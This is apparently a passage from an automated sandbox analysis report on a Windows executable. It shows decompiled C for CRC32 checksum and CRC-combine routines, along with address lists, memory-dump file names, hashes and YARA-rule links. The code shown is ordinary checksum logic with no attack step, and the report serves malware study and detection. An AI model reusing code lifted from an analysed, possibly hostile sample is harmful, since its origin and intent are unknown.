4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x18) * 4) ^  *(0x413dc8 + (_t158 & 0x000000ff) * 4) ^ _t242[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t229 >> 0x18) * 4) ^  *(0x413dc8 + (_t229 & 0x000000ff) * 4) ^ _t242[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t163 >> 0x18) * 4) ^  *(0x413dc8 + (_t163 & 0x000000ff) * 4) ^  *_t164;
							_t146 =  &(_t164[1]);
							_t95 =  *(0x4135c8 + (_t234 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (_t234 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t234 >> 0x18) * 4) ^  *(0x413dc8 + (_t234 & 0x000000ff) * 4);
							_t246 = _t246 - 1;
						} while (_t246 != 0);
					}
					if(_t236 >= 4) {
						_t241 = _t236 >> 2;
						do {
							_t98 = _t95 ^  *_t146;
							_t236 = _t236 - 4;
							_t146 = _t146 + 4;
							_t95 =  *(0x4135c8 + (_t98 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (_t98 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t98 >> 0x18) * 4) ^  *(0x413dc8 + (_t98 & 0x000000ff) * 4);
							_t241 = _t241 - 1;
						} while (_t241 != 0);
					}
					if(_t236 != 0) {
						do {
							_t165 =  *_t146 & 0x000000ff;
							_t146 = _t146 + 1;
							_t95 = _t95 >> 0x00000008 ^  *(0x4131c8 + ((_t165 ^ _t95) & 0x000000ff) * 4);
							_t236 = _t236 - 1;
						} while (_t236 != 0);
					}
					return  !_t95;
				} else {
					return _t93;
				}
			}

















                                                                                                                                                                      0x004102d0
                                                                                                                                                                      0x004102d6
                                                                                                                                                                      0x004102d9
                                                                                                                                                                      0x004107b5
                                                                                                                                                                      0x004107b9
                                                                                                                                                                      0x004107bc
                                                                                                                                                                      0x004107c2
                                                                                                                                                                      0x004107c4
                                                                                                                                                                      0x004107c9
                                                                                                                                                                      0x004107cc
                                                                                                                                                                      0x004107d8
                                                                                                                                                                      0x004107df
                                                                                                                                                                      0x004107e0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004107e0
                                                                                                                                                                      0x004107c4
                                                                                                                                                                      0x004107e2
                                                                                                                                                                      0x004107e6
                                                                                                                                                                      0x004107ef
                                                                                                                                                                      0x004107f2
                                                                                                                                                                      0x0041082e
                                                                                                                                                                      0x00410836
                                                                                                                                                                      0x0041083a
                                                                                                                                                                      0x00410928
                                                                                                                                                                      0x0041094e
                                                                                                                                                                      0x00410967
                                                                                                                                                                      0x0041096a
                                                                                                                                                                      0x0041096f
                                                                                                                                                                      0x004109a3
                                                                                                                                                                      0x004109ac
                                                                                                                                                                      0x004109ae
                                                                                                                                                                      0x004109e3
                                                                                                                                                                      0x004109ea
                                                                                                                                                                      0x004109ea
                                                                                                                                                                      0x004109f1
                                                                                                                                                                      0x004109f5
                                                                                                                                                                      0x004109f9
                                                                                                                                                                      0x00410a00
                                                                                                                                                                      0x00410a00
                                                                                                                                                                      0x00410a02
                                                                                                                                                                      0x00410a0c
                                                                                                                                                                      0x00410a42
                                                                                                                                                                      0x00410a44
                                                                                                                                                                      0x00410a44
                                                                                                                                                                      0x00410a00
                                                                                                                                                                      0x00410a4a
                                                                                                                                                                      0x00410a50
                                                                                                                                                                      0x00410a50
                                                                                                                                                                      0x00410a53
                                                                                                                                                                      0x00410a61
                                                                                                                                                                      0x00410a68
                                                                                                                                                                      0x00410a68
                                                                                                                                                                      0x00410a50
                                                                                                                                                                      0x00410a6f
                                                                                                                                                                      0x004102d8
                                                                                                                                                                      0x004102d8
                                                                                                                                                                      0x004102d8

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e936c083af54460385bf2ea051fe1ceaecbd2b1360fccd680d527d7d1d40fc92
                                                                                                                                                                      • Instruction ID: 848bb24f37e843774877416362c6b1d88ec077a2887b730543c1b80e193f658d
                                                                                                                                                                      • Opcode Fuzzy Hash: e936c083af54460385bf2ea051fe1ceaecbd2b1360fccd680d527d7d1d40fc92
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F71F5716205426BD724CF1DECD0A763792FBC9711F4AC63CDA4287396C238EA62D794
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004105F0, Relevance: .1, Instructions: 143COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004105F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				char _v128;
				char _v256;
				signed int _t52;
				unsigned int _t53;
				unsigned int _t54;
				unsigned int _t55;
				unsigned int _t62;
				signed int* _t66;
				signed int* _t67;
				signed int _t70;
				signed int _t73;
				signed int* _t74;
				signed int* _t75;
				signed int* _t76;
				signed int* _t77;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				signed int _t97;

				_t96 =  &_v256;
				_t94 = _a12;
				_t86 = _a16;
				_t97 = _t86;
				if(_t97 > 0 || _t97 >= 0 && _t94 != 0) {
					_t73 = 1;
					_v256 = 0xedb88320;
					_t52 = 1;
					do {
						 *(_t96 + 8 + _t52 * 4) = _t73;
						_t52 = _t52 + 1;
						_t73 = _t73 + _t73;
					} while (_t52 < 0x20);
					_t89 = 0;
					do {
						_t53 =  *(_t96 + _t89 + 0x10);
						_t74 =  &_v256;
						_t82 = 0;
						if(_t53 != 0) {
							do {
								if((_t53 & 0x00000001) != 0) {
									_t82 = _t82 ^  *_t74;
								}
								_t74 =  &(_t74[1]);
								_t53 = _t53 >> 1;
							} while (_t53 != 0);
						}
						 *(_t96 + _t89 + 0x90) = _t82;
						_t89 = _t89 + 4;
					} while (_t89 < 0x80);
					_t90 = 0;
					do {
						_t54 =  *(_t96 + _t90 + 0x90);
						_t75 =  &_v128;
						_t83 = 0;
						if(_t54 != 0) {
							do {
								if((_t54 & 0x00000001) != 0) {
									_t83 = _t83 ^  *_t75;
								}
								_t75 =  &(_t75[1]);
								_t54 = _t54 >> 1;
							} while (_t54 != 0);
						}
						 *(_t96 + _t90 + 0x10) = _t83;
						_t90 = _t90 + 4;
					} while (_t90 < 0x80);
					_t70 = _a4;
					do {
						_t91 = 0;
						do {
							_t55 =  *(_t96 + _t91 + 0x10);
							_t76 =  &_v256;
							_t84 = 0;
							if(_t55 != 0) {
								do {
									if((_t55 & 0x00000001) != 0) {
										_t84 = _t84 ^  *_t76;
									}
									_t76 =  &(_t76[1]);
									_t55 = _t55 >> 1;
								} while (_t55 != 0);
							}
							 *(_t96 + _t91 + 0x90) = _t84;
							_t91 = _t91 + 4;
						} while (_t91 < 0x80);
						if((_t94 & 0x00000001) != 0) {
							_t81 = 0;
							_t67 =  &_v128;
							if(_t70 != 0) {
								do {
									if((_t70 & 0x00000001) != 0) {
										_t81 = _t81 ^  *_t67;
									}
									_t67 =  &(_t67[1]);
									_t70 = _t70 >> 1;
								} while (_t70 != 0);
							}
							_t70 = _t81;
						}
						_t95 = (_t86 << 0x00000020 | _t94) >> 1;
						_t87 = _t86 >> 1;
						if((_t95 | _t87) != 0) {
							_t93 = 0;
							do {
								_t62 =  *(_t96 + _t93 + 0x90);
								_t77 =  &_v128;
								_t85 = 0;
								if(_t62 != 0) {
									do {
										if((_t62 & 0x00000001) != 0) {
											_t85 = _t85 ^  *_t77;
										}
										_t77 =  &(_t77[1]);
										_t62 = _t62 >> 1;
									} while (_t62 != 0);
								}
								 *(_t96 + _t93 + 0x10) = _t85;
								_t93 = _t93 + 4;
							} while (_t93 < 0x80);
							if((_t95 & 0x00000001) != 0) {
								_t80 = 0;
								_t66 =  &_v256;
								if(_t70 != 0) {
									do {
										if((_t70 & 0x00000001) != 0) {
											_t80 = _t80 ^  *_t66;
										}
										_t66 =  &(_t66[1]);
										_t70 = _t70 >> 1;
									} while (_t70 != 0);
								}
								_t70 = _t80;
							}
							goto L45;
						}
						break;
						L45:
						_t94 = (_t87 << 0x00000020 | _t95) >> 1;
						_t86 = _t87 >> 1;
					} while ((_t94 | _t86) != 0);
					return _t70 ^ _a8;
				} else {
					return _a4;
				}
			}


































                                                                                                                                                                      0x004105f0
                                                                                                                                                                      0x004105f7
                                                                                                                                                                      0x004105ff
                                                                                                                                                                      0x00410606
                                                                                                                                                                      0x00410608
                                                                                                                                                                      0x00410620
                                                                                                                                                                      0x00410625
                                                                                                                                                                      0x0041062d
                                                                                                                                                                      0x00410630
                                                                                                                                                                      0x00410630
                                                                                                                                                                      0x00410634
                                                                                                                                                                      0x00410635
                                                                                                                                                                      0x00410637
                                                                                                                                                                      0x0041063e
                                                                                                                                                                      0x00410640
                                                                                                                                                                      0x00410640
                                                                                                                                                                      0x00410644
                                                                                                                                                                      0x00410648
                                                                                                                                                                      0x0041064c
                                                                                                                                                                      0x00410650
                                                                                                                                                                      0x00410652
                                                                                                                                                                      0x00410654
                                                                                                                                                                      0x00410654
                                                                                                                                                                      0x00410656
                                                                                                                                                                      0x00410659
                                                                                                                                                                      0x00410659
                                                                                                                                                                      0x00410650
                                                                                                                                                                      0x0041065d
                                                                                                                                                                      0x00410664
                                                                                                                                                                      0x00410667
                                                                                                                                                                      0x0041066f
                                                                                                                                                                      0x00410680
                                                                                                                                                                      0x00410680
                                                                                                                                                                      0x00410687
                                                                                                                                                                      0x0041068e
                                                                                                                                                                      0x00410692
                                                                                                                                                                      0x00410694
                                                                                                                                                                      0x00410696
                                                                                                                                                                      0x00410698
                                                                                                                                                                      0x00410698
                                                                                                                                                                      0x0041069a
                                                                                                                                                                      0x0041069d
                                                                                                                                                                      0x0041069d
                                                                                                                                                                      0x00410694
                                                                                                                                                                      0x004106a1
                                                                                                                                                                      0x004106a5
                                                                                                                                                                      0x004106a8
                                                                                                                                                                      0x004106b0
                                                                                                                                                                      0x004106c0
                                                                                                                                                                      0x004106c0
                                                                                                                                                                      0x004106c2
                                                                                                                                                                      0x004106c2
                                                                                                                                                                      0x004106c6
                                                                                                                                                                      0x004106ca
                                                                                                                                                                      0x004106ce
                                                                                                                                                                      0x004106d0
                                                                                                                                                                      0x004106d2
                                                                                                                                                                      0x004106d4
                                                                                                                                                                      0x004106d4
                                                                                                                                                                      0x004106d6
                                                                                                                                                                      0x004106d9
                                                                                                                                                                      0x004106d9
                                                                                                                                                                      0x004106d0
                                                                                                                                                                      0x004106dd
                                                                                                                                                                      0x004106e4
                                                                                                                                                                      0x004106e7
                                                                                                                                                                      0x004106f7
                                                                                                                                                                      0x004106f9
                                                                                                                                                                      0x004106fb
                                                                                                                                                                      0x00410704
                                                                                                                                                                      0x00410706
                                                                                                                                                                      0x00410709
                                                                                                                                                                      0x0041070b
                                                                                                                                                                      0x0041070b
                                                                                                                                                                      0x0041070d
                                                                                                                                                                      0x00410710
                                                                                                                                                                      0x00410710
                                                                                                                                                                      0x00410706
                                                                                                                                                                      0x00410714
                                                                                                                                                                      0x00410714
                                                                                                                                                                      0x00410716
                                                                                                                                                                      0x0041071a
                                                                                                                                                                      0x00410720
                                                                                                                                                                      0x00410722
                                                                                                                                                                      0x00410730
                                                                                                                                                                      0x00410730
                                                                                                                                                                      0x00410737
                                                                                                                                                                      0x0041073e
                                                                                                                                                                      0x00410742
                                                                                                                                                                      0x00410744
                                                                                                                                                                      0x00410746
                                                                                                                                                                      0x00410748
                                                                                                                                                                      0x00410748
                                                                                                                                                                      0x0041074a
                                                                                                                                                                      0x0041074d
                                                                                                                                                                      0x0041074d
                                                                                                                                                                      0x00410744
                                                                                                                                                                      0x00410751
                                                                                                                                                                      0x00410755
                                                                                                                                                                      0x00410758
                                                                                                                                                                      0x00410768
                                                                                                                                                                      0x0041076a
                                                                                                                                                                      0x0041076c
                                                                                                                                                                      0x00410772
                                                                                                                                                                      0x00410774
                                                                                                                                                                      0x00410777
                                                                                                                                                                      0x00410779
                                                                                                                                                                      0x00410779
                                                                                                                                                                      0x0041077b
                                                                                                                                                                      0x0041077e
                                                                                                                                                                      0x0041077e
                                                                                                                                                                      0x00410774
                                                                                                                                                                      0x00410782
                                                                                                                                                                      0x00410782
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00410768
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00410784
                                                                                                                                                                      0x00410784
                                                                                                                                                                      0x00410788
                                                                                                                                                                      0x0041078c
                                                                                                                                                                      0x004107a7
                                                                                                                                                                      0x00410610
                                                                                                                                                                      0x0041061f
                                                                                                                                                                      0x0041061f

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                                                                                                                                                      • Instruction ID: 19a71de24262d1b0f8e3dc72ae5639476eb557387d8cace6485a3b0ea221bfc4
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                                                                                                                                                      • Instruction Fuzzy Hash: FD41E3326047054BE728DE28D8547EB7390EBD4304F49093FD9AA973C0C7F9E9D68689
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00410673, Relevance: .1, Instructions: 100COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00410673(signed int __edi, void* __esi, signed int __ebp, char _a16, char _a144, signed int _a276, signed int _a280) {
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t46;
				signed int* _t50;
				signed int* _t51;
				signed int _t52;
				signed int* _t55;
				signed int* _t56;
				signed int* _t57;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				void* _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				signed int _t73;
				void* _t75;

				_t72 = __ebp;
				_t68 = __esi;
				_t65 = __edi;
				do {
					_t38 =  *(_t75 + _t68 + 0x90);
					_t55 =  &_a144;
					_t62 = 0;
					if(_t38 != 0) {
						do {
							if((_t38 & 0x00000001) != 0) {
								_t62 = _t62 ^  *_t55;
							}
							_t55 =  &(_t55[1]);
							_t38 = _t38 >> 1;
						} while (_t38 != 0);
					}
					 *(_t75 + _t68 + 0x10) = _t62;
					_t68 = _t68 + 4;
				} while (_t68 < 0x80);
				_t52 = _a276;
				do {
					_t69 = 0;
					do {
						_t39 =  *(_t75 + _t69 + 0x10);
						_t56 =  &_a16;
						_t63 = 0;
						if(_t39 != 0) {
							do {
								if((_t39 & 0x00000001) != 0) {
									_t63 = _t63 ^  *_t56;
								}
								_t56 =  &(_t56[1]);
								_t39 = _t39 >> 1;
							} while (_t39 != 0);
						}
						 *(_t75 + _t69 + 0x90) = _t63;
						_t69 = _t69 + 4;
					} while (_t69 < 0x80);
					if((_t72 & 0x00000001) != 0) {
						_t61 = 0;
						_t51 =  &_a144;
						if(_t52 != 0) {
							do {
								if((_t52 & 0x00000001) != 0) {
									_t61 = _t61 ^  *_t51;
								}
								_t51 =  &(_t51[1]);
								_t52 = _t52 >> 1;
							} while (_t52 != 0);
						}
						_t52 = _t61;
					}
					_t73 = (_t65 << 0x00000020 | _t72) >> 1;
					_t66 = _t65 >> 1;
					if((_t73 | _t66) != 0) {
						_t71 = 0;
						do {
							_t46 =  *(_t75 + _t71 + 0x90);
							_t57 =  &_a144;
							_t64 = 0;
							if(_t46 != 0) {
								do {
									if((_t46 & 0x00000001) != 0) {
										_t64 = _t64 ^  *_t57;
									}
									_t57 =  &(_t57[1]);
									_t46 = _t46 >> 1;
								} while (_t46 != 0);
							}
							 *(_t75 + _t71 + 0x10) = _t64;
							_t71 = _t71 + 4;
						} while (_t71 < 0x80);
						if((_t73 & 0x00000001) != 0) {
							_t60 = 0;
							_t50 =  &_a16;
							if(_t52 != 0) {
								do {
									if((_t52 & 0x00000001) != 0) {
										_t60 = _t60 ^  *_t50;
									}
									_t50 =  &(_t50[1]);
									_t52 = _t52 >> 1;
								} while (_t52 != 0);
							}
							_t52 = _t60;
						}
						goto L32;
					}
					break;
					L32:
					_t72 = (_t66 << 0x00000020 | _t73) >> 1;
					_t65 = _t66 >> 1;
				} while ((_t72 | _t65) != 0);
				return _t52 ^ _a280;
			}

























                                                                                                                                                                      0x00410673
                                                                                                                                                                      0x00410673
                                                                                                                                                                      0x00410673
                                                                                                                                                                      0x00410680
                                                                                                                                                                      0x00410680
                                                                                                                                                                      0x00410687
                                                                                                                                                                      0x0041068e
                                                                                                                                                                      0x00410692
                                                                                                                                                                      0x00410694
                                                                                                                                                                      0x00410696
                                                                                                                                                                      0x00410698
                                                                                                                                                                      0x00410698
                                                                                                                                                                      0x0041069a
                                                                                                                                                                      0x0041069d
                                                                                                                                                                      0x0041069d
                                                                                                                                                                      0x00410694
                                                                                                                                                                      0x004106a1
                                                                                                                                                                      0x004106a5
                                                                                                                                                                      0x004106a8
                                                                                                                                                                      0x004106b0
                                                                                                                                                                      0x004106c0
                                                                                                                                                                      0x004106c0
                                                                                                                                                                      0x004106c2
                                                                                                                                                                      0x004106c2
                                                                                                                                                                      0x004106c6
                                                                                                                                                                      0x004106ca
                                                                                                                                                                      0x004106ce
                                                                                                                                                                      0x004106d0
                                                                                                                                                                      0x004106d2
                                                                                                                                                                      0x004106d4
                                                                                                                                                                      0x004106d4
                                                                                                                                                                      0x004106d6
                                                                                                                                                                      0x004106d9
                                                                                                                                                                      0x004106d9
                                                                                                                                                                      0x004106d0
                                                                                                                                                                      0x004106dd
                                                                                                                                                                      0x004106e4
                                                                                                                                                                      0x004106e7
                                                                                                                                                                      0x004106f7
                                                                                                                                                                      0x004106f9
                                                                                                                                                                      0x004106fb
                                                                                                                                                                      0x00410704
                                                                                                                                                                      0x00410706
                                                                                                                                                                      0x00410709
                                                                                                                                                                      0x0041070b
                                                                                                                                                                      0x0041070b
                                                                                                                                                                      0x0041070d
                                                                                                                                                                      0x00410710
                                                                                                                                                                      0x00410710
                                                                                                                                                                      0x00410706
                                                                                                                                                                      0x00410714
                                                                                                                                                                      0x00410714
                                                                                                                                                                      0x00410716
                                                                                                                                                                      0x0041071a
                                                                                                                                                                      0x00410720
                                                                                                                                                                      0x00410722
                                                                                                                                                                      0x00410730
                                                                                                                                                                      0x00410730
                                                                                                                                                                      0x00410737
                                                                                                                                                                      0x0041073e
                                                                                                                                                                      0x00410742
                                                                                                                                                                      0x00410744
                                                                                                                                                                      0x00410746
                                                                                                                                                                      0x00410748
                                                                                                                                                                      0x00410748
                                                                                                                                                                      0x0041074a
                                                                                                                                                                      0x0041074d
